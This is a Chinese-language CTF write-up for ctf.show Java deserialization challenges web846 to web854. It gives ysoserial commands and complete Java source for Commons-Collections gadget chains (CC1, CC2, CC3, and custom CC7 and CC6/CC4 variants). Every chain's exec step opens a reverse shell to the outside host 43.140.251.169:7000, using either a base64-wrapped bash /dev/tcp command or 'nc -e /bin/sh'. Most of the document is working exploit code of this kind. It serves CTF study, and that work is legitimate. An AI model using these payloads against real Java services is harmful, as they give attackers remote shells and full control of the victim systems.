反弹shell问题
web846(URLDNS)
java -jar ysoserial-all.jar URLDNS "http://e861ea18-56c2-48fb-96c8-52b488d55710.challenge.ctf.show" | base64
把得到的 Base64 串提交即可。注意这条命令要在 Linux 虚拟机里跑：Windows 下没有 `base64` 命令，管道这一步会失败。URLDNS 链本身只触发一次 DNS 解析、不会执行任何命令，所以它只用来确认反序列化入口确实存在。
web847
![image.png](https://cdn.nlark.com/yuque/0/2022/png/32634994/1671781322014-28df7ded-c06d-4d2a-aad5-0741644c8571.png#averageHue=%23f4f2f0&clientId=ua957003d-8ca4-4&from=paste&height=163&id=u9a26a82f&name=image.png&originHeight=204&originWidth=776&originalType=binary&ratio=1&rotation=0&showTitle=false&size=21704&status=done&style=none&taskId=uae3c3d41-680b-4467-ac4d-f67d22b8887&title=&width=620.8)
CC1、CC6、CC7 等链都能打通这题。这里我没用 ysoserial，而是用自己构造的 payload（TransformedMap 版本的 CC1），原理和 ysoserial 的基本一致。
| import org.apache.commons.collections.Transformer; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collections.functors.ConstantTransformer; import org.apache.commons.collections.functors.InvokerTransformer; import org.apache.commons.collections.map.LazyMap; import org.apache.commons.collections.map.TransformedMap; import sun.misc.BASE64Decoder; import sun.misc.BASE64Encoder;
import java.io.*; import java.lang.annotation.Target; import java.lang.reflect.Constructor; import java.lang.reflect.Method; import java.nio.file.Files; import java.nio.file.Paths; import java.util.Base64; import java.util.HashMap; import java.util.Map;
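public class CC1 {

    /**
     * Builds a CommonsCollections1-style payload (TransformedMap variant), serializes it to
     * {@code ser.bin} and prints the Base64 of that file for submission.
     *
     * <p>Structure: an {@code AnnotationInvocationHandler} for {@code Target} whose member map is a
     * {@code TransformedMap} decorated with a Runtime.exec transformer chain. The chain is expected
     * to fire when the handler is deserialized on the target (the classic CC1 trigger).
     *
     * <p>NOTE(review): this variant depends on the JDK-internal
     * {@code sun.reflect.annotation.AnnotationInvocationHandler} readObject behaviour, which changed
     * in later JDK 8 updates; whether it fires depends on the target's JDK version — confirm.
     */
    public static void main(String[] args) throws Exception {
        // Runtime.getRuntime().exec(cmd) built reflectively, because Runtime itself is not
        // Serializable; each InvokerTransformer is applied to the previous transformer's result.
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod",
                        new Class[]{String.class, Class[].class},
                        new Object[]{"getRuntime", null}),
                new InvokerTransformer("invoke",
                        new Class[]{Object.class, Object[].class},
                        new Object[]{null, null}),
                // Reverse shell (bash -i >& /dev/tcp/<listener>/7000 0>&1) wrapped as
                // {echo,...}|{base64,-d}|{bash,-i} so it survives Runtime.exec's whitespace
                // tokenizing. The leading space is harmless to that tokenizer.
                new InvokerTransformer("exec",
                        new Class[]{String.class},
                        new Object[]{" bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80My4xNDAuMjUxLjE2OS83MDAwIDA+JjE=}|{base64,-d}|{bash,-i}"})
        };
        ChainedTransformer chain = new ChainedTransformer(transformers);

        // "value" is the single member of @Target; the CC1 trigger needs a key that is a real
        // member of the annotation type the handler is built for.
        HashMap<Object, Object> backing = new HashMap<>();
        backing.put("value", "aaa");
        Map<Object, Object> transformedMap = TransformedMap.decorate(backing, null, chain);

        // AnnotationInvocationHandler is package-private, hence reflection.
        Class<?> handlerClass = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor<?> handlerCtor = handlerClass.getDeclaredConstructor(Class.class, Map.class);
        handlerCtor.setAccessible(true);
        Object payload = handlerCtor.newInstance(Target.class, transformedMap);

        serialize(payload);
        System.out.println(encryptToBase64("ser.bin"));
    }

    /**
     * Writes {@code obj} to {@code ser.bin}. The stream is closed via try-with-resources so the
     * file is fully flushed and the handle released (the original never closed it).
     */
    public static void serialize(Object obj) throws Exception {
        try (ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"))) {
            oos.writeObject(obj);
        }
    }

    /**
     * Reads one object back from {@code filename}. Kept for local verification only: this is a
     * bare {@code ObjectInputStream.readObject()} with no ObjectInputFilter, so pointing it at
     * {@code ser.bin} runs the gadget chain on the machine generating the payload.
     */
    public static Object unserialize(String filename) throws Exception {
        try (ObjectInputStream ois = new ObjectInputStream(new FileInputStream(filename))) {
            return ois.readObject();
        }
    }

    /**
     * Base64 (not encryption, despite the name) of the file's bytes.
     *
     * @param filePath path to read; {@code null} yields {@code null}
     * @return the Base64 string, or {@code null} if the path is null or the file cannot be read
     *         (the error is reported on stderr instead of being swallowed)
     */
    public static String encryptToBase64(String filePath) {
        if (filePath == null) {
            return null;
        }
        try {
            byte[] bytes = Files.readAllBytes(Paths.get(filePath));
            return Base64.getEncoder().encodeToString(bytes);
        } catch (IOException e) {
            System.err.println("cannot read " + filePath + ": " + e);
            return null;
        }
    }
}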
把生成的 Base64 payload 做一次 URL 编码后再传入即可（Base64 里的 `+`、`/`、`=` 如果不编码，会在服务端 URL 解码时被改掉，导致反序列化失败）：
![image.png](https://cdn.nlark.com/yuque/0/2022/png/32634994/1671781422134-baeb69bb-680d-4a5d-8e5d-8e30f2ede3d2.png#averageHue=%230a0706&clientId=ua957003d-8ca4-4&from=paste&height=141&id=ub034edc3&name=image.png&originHeight=176&originWidth=829&originalType=binary&ratio=1&rotation=0&showTitle=false&size=16316&status=done&style=none&taskId=u598b8185-f605-4235-a6a8-68a9204597d&title=&width=663.2)
web848
直接用 ysoserial 的 CC1（LazyMap + 动态代理版本）即可，或者换成其他不依赖 TransformedMap 的链也行，因为这题把 TransformedMap 禁掉了。
| import org.apache.commons.collections.Transformer; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collections.functors.ConstantTransformer; import org.apache.commons.collections.functors.InvokerTransformer; import org.apache.commons.collections.map.LazyMap; import org.apache.commons.collections.map.TransformedMap;
import java.io.*; import java.lang.annotation.Target; import java.lang.reflect.Constructor; import java.lang.reflect.InvocationHandler; import java.lang.reflect.Method; import java.lang.reflect.Proxy; import java.nio.file.Files; import java.nio.file.Paths; import java.util.Base64; import java.util.HashMap; import java.util.Map;
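public class CC1test {

    /**
     * Builds the ysoserial-style CommonsCollections1 payload (LazyMap + dynamic proxy, no
     * TransformedMap), serializes it to {@code ser.bin} and prints the file as Base64.
     *
     * <p>Structure: an {@code AnnotationInvocationHandler} whose member map is a {@code Map} proxy;
     * the proxy's invocation handler is a second {@code AnnotationInvocationHandler} wrapping a
     * {@code LazyMap} decorated with the Runtime.exec chain. Any Map call on the proxy during
     * deserialization is expected to end in {@code LazyMap.get()} and run the chain.
     */
    public static void main(String[] args) throws Exception {
        // Runtime.getRuntime().exec(cmd) resolved reflectively (Runtime is not Serializable).
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod",
                        new Class[]{String.class, Class[].class},
                        new Object[]{"getRuntime", null}),
                new InvokerTransformer("invoke",
                        new Class[]{Object.class, Object[].class},
                        new Object[]{null, null}),
                // bash -i >& /dev/tcp/<listener>/7000 0>&1, base64-wrapped so Runtime.exec's
                // whitespace tokenizing does not break the redirections.
                new InvokerTransformer("exec",
                        new Class[]{String.class},
                        new Object[]{"bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80My4xNDAuMjUxLjE2OS83MDAwIDA+JjE=}|{base64,-d}|{bash,-i}"})
        };
        ChainedTransformer chain = new ChainedTransformer(transformers);

        // LazyMap hands a missing key to the transformer; nothing is pre-populated.
        HashMap<Object, Object> backing = new HashMap<>();
        Map<Object, Object> lazyMap = LazyMap.decorate(backing, chain);

        // AnnotationInvocationHandler is package-private, hence reflection.
        Class<?> handlerClass = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor<?> handlerCtor = handlerClass.getDeclaredConstructor(Class.class, Map.class);
        handlerCtor.setAccessible(true);

        // Inner handler over the LazyMap, exposed as a java.lang.reflect.Proxy implementing Map,
        // so every Map method invoked on the proxy is routed through the handler.
        InvocationHandler inner = (InvocationHandler) handlerCtor.newInstance(Override.class, lazyMap);
        Map<?, ?> proxiedMap = (Map<?, ?>) Proxy.newProxyInstance(
                LazyMap.class.getClassLoader(), new Class[]{Map.class}, inner);

        // Outer handler: the proxy becomes its member map, which is what gets touched on readObject.
        Object payload = handlerCtor.newInstance(Override.class, proxiedMap);

        serialize(payload);
        System.out.println(encryptToBase64("ser.bin"));
    }

    /**
     * Writes {@code obj} to {@code ser.bin}, closing the stream so the file is complete and the
     * handle released (the original left it open).
     */
    public static void serialize(Object obj) throws Exception {
        try (ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"))) {
            oos.writeObject(obj);
        }
    }

    /**
     * Reads one object from {@code filename}. Local verification only: plain
     * {@code readObject()} without an ObjectInputFilter, so feeding it {@code ser.bin} fires the
     * gadget chain on this machine.
     */
    public static Object unserialize(String filename) throws Exception {
        try (ObjectInputStream ois = new ObjectInputStream(new FileInputStream(filename))) {
            return ois.readObject();
        }
    }

    /**
     * Base64 (not encryption) of the file's bytes.
     *
     * @param filePath path to read; {@code null} yields {@code null}
     * @return Base64 string, or {@code null} when the path is null or unreadable (error on stderr)
     */
    public static String encryptToBase64(String filePath) {
        if (filePath == null) {
            return null;
        }
        try {
            byte[] bytes = Files.readAllBytes(Paths.get(filePath));
            return Base64.getEncoder().encodeToString(bytes);
        } catch (IOException e) {
            System.err.println("cannot read " + filePath + ": " + e);
            return null;
        }
    }
}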
![image.png](https://cdn.nlark.com/yuque/0/2022/png/32634994/1671860902107-364b5526-3df5-4251-868d-2ad2c365c6e5.png#averageHue=%23262524&clientId=uae124d76-c268-4&from=paste&height=106&id=u22095dbd&name=image.png&originHeight=132&originWidth=553&originalType=binary&ratio=1&rotation=0&showTitle=false&size=7862&status=done&style=none&taskId=u81948ac5-991c-4fc2-90e0-4d7324120c7&title=&width=442.4)
web849
这题依赖换成了 commons-collections4，能直接用的只剩 CC2 和 CC4 两条链。
| import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; import org.apache.commons.collections4.comparators.TransformingComparator; import org.apache.commons.collections4.functors.ConstantTransformer; import org.apache.commons.collections4.functors.InvokerTransformer; import java.io.*; import java.lang.reflect.Field; import java.nio.file.Files; import java.nio.file.Paths; import java.util.Base64;
import java.util.PriorityQueue;
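public class CC2 {

    /**
     * Builds the CommonsCollections2 payload (commons-collections4): a {@code PriorityQueue}
     * whose {@code TransformingComparator} calls {@code newTransformer()} on a {@code TemplatesImpl}
     * carrying the attacker class. Serializes it to {@code ser.bin} and prints the Base64.
     *
     * <p>The transformer that does the work is swapped in by reflection only after the queue is
     * built, so the payload does not execute on the machine generating it.
     */
    public static void main(String[] args) throws Exception {
        // TemplatesImpl carrying the malicious class bytes. _name is set because TemplatesImpl
        // refuses to load translet classes when it is null (the usual TemplatesImpl gadget
        // requirement); _bytecodes holds the class file. _tfactory is not set here —
        // NOTE(review): presumably re-created by TemplatesImpl on deserialization; confirm.
        TemplatesImpl templates = new TemplatesImpl();
        Class<?> tplClass = TemplatesImpl.class;
        Field nameField = tplClass.getDeclaredField("_name");
        nameField.setAccessible(true);
        nameField.set(templates, "Boogipop");
        Field bytecodesField = tplClass.getDeclaredField("_bytecodes");
        bytecodesField.setAccessible(true);
        // Hard-coded build-output path of EXEC.class; its source is not part of this listing.
        byte[] code = Files.readAllBytes(Paths.get("E:\\\\CTF学习笔记\\\\Java\\\\CC1-NEW\\\\target\\\\classes\\\\EXEC.class"));
        bytecodesField.set(templates, new byte[][]{code});

        // newTransformer() on the TemplatesImpl is the call that loads and instantiates EXEC.
        InvokerTransformer newTransformer =
                new InvokerTransformer("newTransformer", new Class[]{}, new Object[]{});

        // Build the queue with a harmless ConstantTransformer first: the second add() already
        // runs the comparator, and that must not execute the payload locally.
        TransformingComparator comparator = new TransformingComparator(new ConstantTransformer(1));
        PriorityQueue<Object> queue = new PriorityQueue<Object>(comparator);
        queue.add(templates);
        queue.add(2); // a second element so the queue has something to compare on readObject

        // Arm the comparator now; it only runs again when the target deserializes the queue.
        Field transformerField = comparator.getClass().getDeclaredField("transformer");
        transformerField.setAccessible(true);
        transformerField.set(comparator, newTransformer);

        serialize(queue);
        System.out.println(encryptToBase64("ser.bin"));
    }

    /**
     * Writes {@code obj} to {@code ser.bin}, closing the stream so the file is complete and the
     * handle released (the original left it open).
     */
    public static void serialize(Object obj) throws Exception {
        try (ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"))) {
            oos.writeObject(obj);
        }
    }

    /**
     * Reads one object from {@code filename}. Local verification only: plain
     * {@code readObject()} with no ObjectInputFilter — deserializing {@code ser.bin} here would
     * run the payload on this machine.
     */
    public static Object unserialize(String filename) throws Exception {
        try (ObjectInputStream ois = new ObjectInputStream(new FileInputStream(filename))) {
            return ois.readObject();
        }
    }

    /**
     * Base64 (not encryption) of the file's bytes.
     *
     * @param filePath path to read; {@code null} yields {@code null}
     * @return Base64 string, or {@code null} when the path is null or unreadable (error on stderr)
     */
    public static String encryptToBase64(String filePath) {
        if (filePath == null) {
            return null;
        }
        try {
            byte[] bytes = Files.readAllBytes(Paths.get(filePath));
            return Base64.getEncoder().encodeToString(bytes);
        } catch (IOException e) {
            System.err.println("cannot read " + filePath + ": " + e);
            return null;
        }
    }
}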
这里我选了 CC2。题目提示目标上装了 nc，所以 EXEC.class（被塞进 TemplatesImpl 的恶意类，源码此处未贴出）里直接用 nc 反弹 shell 即可。
![image.png](https://cdn.nlark.com/yuque/0/2022/png/32634994/1671861562236-79e7b395-e156-4d9a-bf9d-f74b23c79657.png#averageHue=%23343433&clientId=u3b7e5ca9-8bbc-4&from=paste&height=103&id=u52faa3a8&name=image.png&originHeight=129&originWidth=605&originalType=binary&ratio=1&rotation=0&showTitle=false&size=5165&status=done&style=none&taskId=u84e2aa13-66e5-4708-a45d-3733227f97c&title=&width=484)
web850
CC3链
java -jar ysoserial-all.jar CommonsCollections3 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80My4xNDAuMjUxLjE2OS83MDAwIDA+JjE=}|{base64,-d}|{bash,-i}"|base64
![image.png](https://cdn.nlark.com/yuque/0/2022/png/32634994/1671862726418-ffa70db3-2bb3-43ec-a49d-5575f8b5bf5d.png#averageHue=%231d1b1a&clientId=u3b7e5ca9-8bbc-4&from=paste&height=113&id=u3eeb4d85&name=image.png&originHeight=141&originWidth=501&originalType=binary&ratio=1&rotation=0&showTitle=false&size=10067&status=done&style=none&taskId=ue6b4079a-4698-4765-977f-ce83ccd09da&title=&width=400.8)
web851
题目提示有 nc，依赖是 commons-collections4，而且似乎对常见链做了一些拦截（具体限制不明）。
这里用的是基于 CC7 改出来的非标准链：把 LazyMap 换成 commons-collections4 的 DefaultedMap，仍然靠 Hashtable 里两个 hashCode 相同的 key（"yy" / "zZ"）触发 equals 来进入 transform。
| import org.apache.commons.collections4.Transformer; import org.apache.commons.collections4.functors.ChainedTransformer; import org.apache.commons.collections4.functors.ConstantTransformer; import org.apache.commons.collections4.functors.InvokerTransformer; import org.apache.commons.collections.map.LazyMap; import org.apache.commons.collections4.map.DefaultedMap;
import java.io.*; import java.lang.reflect.Constructor; import java.lang.reflect.Field; import java.lang.reflect.InvocationTargetException; import java.nio.file.Files; import java.nio.file.Paths; import java.util.*;
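public class CC7 {

    /**
     * Builds a CC7-shaped payload on commons-collections4, with {@code DefaultedMap} standing in
     * for {@code LazyMap}: two DefaultedMaps whose keys share a hashCode are stored in a
     * {@code Hashtable}, so rebuilding the table on readObject has to call equals() between them,
     * which is expected to reach get() on the other map and hence the transformer chain.
     * Serializes the table to {@code ser.bin} and prints its Base64.
     */
    public static void main(String[] args) throws Exception {
        // Start with an EMPTY chain so that building the Hashtable below cannot run the command
        // on this machine; the real transformers are injected reflectively afterwards.
        Transformer transformerChain = new ChainedTransformer(new Transformer[]{});
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod",
                        new Class[]{String.class, Class[].class},
                        new Object[]{"getRuntime", null}),
                new InvokerTransformer("invoke",
                        new Class[]{Object.class, Object[].class},
                        new Object[]{null, null}),
                // The challenge hint says nc is installed on the target; 7000 is the listener port.
                new InvokerTransformer("exec",
                        new Class[]{String.class},
                        new Object[]{"nc 43.140.251.169 7000 -e /bin/sh"})
        };

        // DefaultedMap hands keys it does not contain to its Transformer. Its (Map, Transformer)
        // constructor is not public, hence reflection.
        Map<Object, Object> innerMap1 = new HashMap<>();
        Map<Object, Object> innerMap2 = new HashMap<>();
        Constructor<DefaultedMap> ctor =
                DefaultedMap.class.getDeclaredConstructor(Map.class, Transformer.class);
        ctor.setAccessible(true);
        DefaultedMap defaultedMap1 = ctor.newInstance(innerMap1, transformerChain);
        DefaultedMap defaultedMap2 = ctor.newInstance(innerMap2, transformerChain);

        // "yy" and "zZ" have the same String.hashCode(), so both maps hash identically and
        // Hashtable must fall back to equals() to tell them apart — that is the trigger.
        defaultedMap1.put("yy", 1);
        defaultedMap2.put("zZ", 1);

        Hashtable<Object, Object> hashtable = new Hashtable<>();
        hashtable.put(defaultedMap1, 1);
        hashtable.put(defaultedMap2, 2);

        // Arm the chain only now that the local put()s (which already ran equals()) are done.
        Field iTransformers = ChainedTransformer.class.getDeclaredField("iTransformers");
        iTransformers.setAccessible(true);
        iTransformers.set(transformerChain, transformers);

        // Carried over from the LazyMap-based CC7, where the key created by equals() has to be
        // removed so the sizes still match on the target. NOTE(review): DefaultedMap.get() does
        // not appear to store generated values, so this is likely a no-op here — confirm.
        defaultedMap2.remove("yy");
        serialize(hashtable);

        System.out.println(encryptToBase64("ser.bin"));
    }

    /**
     * Writes {@code obj} to {@code ser.bin}, closing the stream so the file is complete and the
     * handle released (the original left it open).
     */
    public static void serialize(Object obj) throws Exception {
        try (ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"))) {
            oos.writeObject(obj);
        }
    }

    /**
     * Reads one object from {@code filename}. Local verification only: plain
     * {@code readObject()} with no ObjectInputFilter — deserializing {@code ser.bin} here would
     * run the nc command on this machine.
     */
    public static Object unserialize(String filename) throws Exception {
        try (ObjectInputStream ois = new ObjectInputStream(new FileInputStream(filename))) {
            return ois.readObject();
        }
    }

    /**
     * Base64 (not encryption) of the file's bytes.
     *
     * @param filePath path to read; {@code null} yields {@code null}
     * @return Base64 string, or {@code null} when the path is null or unreadable (error on stderr)
     */
    public static String encryptToBase64(String filePath) {
        if (filePath == null) {
            return null;
        }
        try {
            byte[] bytes = Files.readAllBytes(Paths.get(filePath));
            return Base64.getEncoder().encodeToString(bytes);
        } catch (IOException e) {
            System.err.println("cannot read " + filePath + ": " + e);
            return null;
        }
    }
}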
![image.png](https://cdn.nlark.com/yuque/0/2022/png/32634994/1671873045601-4a34db9d-9e54-41f2-96c5-a99517483f63.png#averageHue=%230b0a0a&clientId=u7206f967-9d13-4&from=paste&height=74&id=u0e556ddf&name=image.png&originHeight=92&originWidth=572&originalType=binary&ratio=1&rotation=0&showTitle=false&size=3989&status=done&style=none&taskId=u78a2c943-284a-4263-ad21-36c0ea0f822&title=&width=457.6)
web852
同上
Web853
同上
Web854
自造的 CC6 + CC4 混合链：入口沿用 CC6 的 HashMap → TiedMapEntry，后半段把 LazyMap 换成 commons-collections4 的 DefaultedMap。
| import org.apache.commons.collections4.keyvalue.TiedMapEntry; import org.apache.commons.collections4.Transformer; import org.apache.commons.collections4.functors.ChainedTransformer; import org.apache.commons.collections4.functors.ConstantTransformer; import org.apache.commons.collections4.functors.InvokerTransformer; import org.apache.commons.collections.map.LazyMap; import org.apache.commons.collections4.map.DefaultedMap;
import java.io.*; import java.lang.reflect.Constructor; import java.lang.reflect.Field; import java.lang.reflect.InvocationTargetException; import java.nio.file.Files; import java.nio.file.Paths; import java.util.*;
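public class Web854 {

    /**
     * Builds a CC6-shaped payload on commons-collections4: a {@code HashMap} holding a
     * {@code TiedMapEntry} whose tied map is a {@code DefaultedMap} (replacing CC6's LazyMap).
     * Hashing the entry on readObject reads its value through the tied map, which hands the
     * missing key to the transformer chain. Serializes the map to {@code ser.bin} and prints
     * its Base64.
     */
    public static void main(String[] args) throws Exception {
        // Start with an EMPTY chain so that building the HashMap below cannot run the command
        // locally; the real transformers are injected reflectively afterwards.
        Transformer transformerChain = new ChainedTransformer(new Transformer[]{});
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod",
                        new Class[]{String.class, Class[].class},
                        new Object[]{"getRuntime", null}),
                new InvokerTransformer("invoke",
                        new Class[]{Object.class, Object[].class},
                        new Object[]{null, null}),
                // nc is available on the target per the challenge hint; 7000 is the listener port.
                new InvokerTransformer("exec",
                        new Class[]{String.class},
                        new Object[]{"nc 43.140.251.169 7000 -e /bin/sh"})
        };

        // DefaultedMap's (Map, Transformer) constructor is not public, hence reflection.
        Map<Object, Object> innerMap = new HashMap<>();
        Constructor<DefaultedMap> ctor =
                DefaultedMap.class.getDeclaredConstructor(Map.class, Transformer.class);
        ctor.setAccessible(true);
        DefaultedMap defaultedMap = ctor.newInstance(innerMap, transformerChain);
        TiedMapEntry tiedMapEntry = new TiedMapEntry(defaultedMap, "aaa");

        // put() hashes the entry immediately, which already goes through the tied map's get();
        // the chain is still empty at this point, so nothing runs here.
        HashMap<Object, Object> payload = new HashMap<>();
        payload.put(tiedMapEntry, "bbb");

        // The original also called remove("aaa") on a separate HashMap that was never wired into
        // the payload — a leftover from the LazyMap variant, where get() stores the generated
        // value and the key must be cleared. Being on an unrelated map it was a no-op and is
        // dropped. NOTE(review): DefaultedMap.get() does not appear to store values, so innerMap
        // should still be empty here — confirm if the target does not trigger.

        // Arm the chain now that the local hashing is done.
        Field iTransformers = ChainedTransformer.class.getDeclaredField("iTransformers");
        iTransformers.setAccessible(true);
        iTransformers.set(transformerChain, transformers);

        serialize(payload);

        System.out.println(encryptToBase64("ser.bin"));
    }

    /**
     * Writes {@code obj} to {@code ser.bin}, closing the stream so the file is complete and the
     * handle released (the original left it open).
     */
    public static void serialize(Object obj) throws Exception {
        try (ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"))) {
            oos.writeObject(obj);
        }
    }

    /**
     * Reads one object from {@code filename}. Local verification only: plain
     * {@code readObject()} with no ObjectInputFilter — deserializing {@code ser.bin} here would
     * run the nc command on this machine.
     */
    public static Object unserialize(String filename) throws Exception {
        try (ObjectInputStream ois = new ObjectInputStream(new FileInputStream(filename))) {
            return ois.readObject();
        }
    }

    /**
     * Base64 (not encryption) of the file's bytes.
     *
     * @param filePath path to read; {@code null} yields {@code null}
     * @return Base64 string, or {@code null} when the path is null or unreadable (error on stderr)
     */
    public static String encryptToBase64(String filePath) {
        if (filePath == null) {
            return null;
        }
        try {
            byte[] bytes = Files.readAllBytes(Paths.get(filePath));
            return Base64.getEncoder().encodeToString(bytes);
        } catch (IOException e) {
            System.err.println("cannot read " + filePath + ": " + e);
            return null;
        }
    }
}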
![image.png](https://cdn.nlark.com/yuque/0/2022/png/32634994/1671874718003-eb499e9c-9607-4318-9414-e1a2a67640ff.png#averageHue=%23121110&clientId=ud42bb3b8-76e4-4&from=paste&height=64&id=u24a44207&name=image.png&originHeight=80&originWidth=600&originalType=binary&ratio=1&rotation=0&showTitle=false&size=4310&status=done&style=none&taskId=u131c3308-99f0-491d-bda7-1f2e57893e5&title=&width=480)